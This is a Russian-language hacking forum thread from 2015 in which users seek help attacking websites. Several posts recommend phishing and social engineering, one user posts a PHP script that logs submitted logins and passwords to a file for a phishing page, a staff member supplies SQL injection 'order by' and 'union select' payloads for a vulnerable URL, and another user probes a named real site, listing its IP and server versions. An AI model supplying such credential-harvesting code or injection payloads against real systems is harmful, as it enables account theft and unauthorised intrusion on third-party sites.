Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. ocheretko

    ocheretko Banned

    Joined:
    15 May 2010
    Messages:
    144
    Likes Received:
    51
    Reputations:
    116
    Можно, применяйте фишинг и социальную инженерию. Не обязательно использовать javascript, достаточно html разметки
     
  2. nik1201

    nik1201 New Member

    Joined:
    12 Jul 2015
    Messages:
    39
    Likes Received:
    1
    Reputations:
    0
    А не подскажете хороший бесплатный хостинг с поддержкой php и доменом .ru?
     
    #382 nik1201, 26 Jul 2015
    Last edited: 26 Jul 2015
  3. nik1201

    nik1201 New Member

    Joined:
    12 Jul 2015
    Messages:
    39
    Likes Received:
    1
    Reputations:
    0
    Хотя поди палевно будет т.к будет ругаться антивирусник.А можно ли при помощи js красть введенные данные из форм?
     
  4. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    134
    Likes Received:
    5
    Reputations:
    1
    подскажите,возможно ли обойти ограничение в 40 символов,в поле восстановления пароля? Правка Html ничего не даёт(хотя раньше пролазило(()
     
  5. frank

    frank Member

    Joined:
    8 May 2015
    Messages:
    200
    Likes Received:
    96
    Reputations:
    28
    руками запрос формировать пробовали для отправки?
    просто длинная поля еще может контролироваться со стороны сервера и тогда скорее всего никак нельзя.
     
  6. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    134
    Likes Received:
    5
    Reputations:
    1
    только ручками и пробовала,скорее всего подправили файлик,всё таки облачный майнинг))
     
  7. ocheretko

    ocheretko Banned

    Joined:
    15 May 2010
    Messages:
    144
    Likes Received:
    51
    Reputations:
    116
  8. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    134
    Likes Received:
    5
    Reputations:
    1
    там SQl inj
     
  9. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    POST запрос отправляемый имеете ввиду пробовали подправлять?
     
  10. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    134
    Likes Received:
    5
    Reputations:
    1
    Да
     
  11. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    Тогда точно на стороне сервера фильтр, больше и не отправите
     
    madam likes this.
  12. nik1201

    nik1201 New Member

    Joined:
    12 Jul 2015
    Messages:
    39
    Likes Received:
    1
    Reputations:
    0
    ----------------------------------------------------------------------------------------------------------------------
    как именно нужно прописать этот php?
    примерно так?)))
    <?php

    $BASE = "base.txt";

    $fd = fopen($BASE,"a+");

    $p0=$_POST['login']

    $p1=$_POST['password']

    $info="$p0:$p1:\n";

    fputs($fd, " login: ".$_POST['login']." password:".$_POST['password']);

    fwrite($fd,$info);

    fclose($fd);
     
  13. sysjuk

    sysjuk Member

    Joined:
    5 Jan 2012
    Messages:
    230
    Likes Received:
    58
    Reputations:
    5
    "site.ru/asdasd.php?id=-123'"
    CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND d.is_deleted=0 AND a.is_deleted=0 AND a.is_approved=1 GROUP by d.id' at line 4
    Как правильно раскрутить ее.
     
  14. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    -123+order+by+100+--+
    -123+union+select+1,2,3,4,5,6+--+

    Всё по стандарту. Никаких аномалий.
     
    _________________________
  15. sysjuk

    sysjuk Member

    Joined:
    5 Jan 2012
    Messages:
    230
    Likes Received:
    58
    Reputations:
    5
    Так дело в том что ничего не меняется))) Уже все перепробовал)
     
  16. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Вы либо ссылку кидайте, либо разбирайтесь дальше сами. Флуд здесь не нужен.
     
  17. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    http://www.toramp.com/schedule.php?id=505' - появляются караракули .
    И ничего более .
    Единственное что узнал .
    Host IP: 109.120.169.82
    Web Server: nginx/0.7.67
    Powered-by: PHP/5.3.3-7+squeeze14
     
  18. ocheretko

    ocheretko Banned

    Joined:
    15 May 2010
    Messages:
    144
    Likes Received:
    51
    Reputations:
    116
    Эти каракули написаны в кодировке - ISO-8859-5, и расшифровываются как Неверный формат запроса. Проверьте URL.
    Простыми словами - Вы получаете сообщение от обработчика ошибок
     
    SaNDER and yarbabin like this.
  19. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    Благодарю,и это не как,не относится к SQL?Взломать нельзя? . Наверно сайт защищен от SQL .
     
  20. Genius Black

    Genius Black New Member

    Joined:
    29 Jul 2015
    Messages:
    34
    Likes Received:
    4
    Reputations:
    0
    Warning: mysql_data_seek(): supplied argument is not a valid MySQL result resource in C:\wamp\www\productos.php on line 41

    Warning: mysql_result(): supplied argument is not a valid MySQL result resource in C:\wamp\www\productos.php on line 42

    Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in C:\wamp\www\productos.php on line 43
    Query invбlido: select explica from linea_explica where linea = ''''

    С этим ничего как я понял нельзя сделать?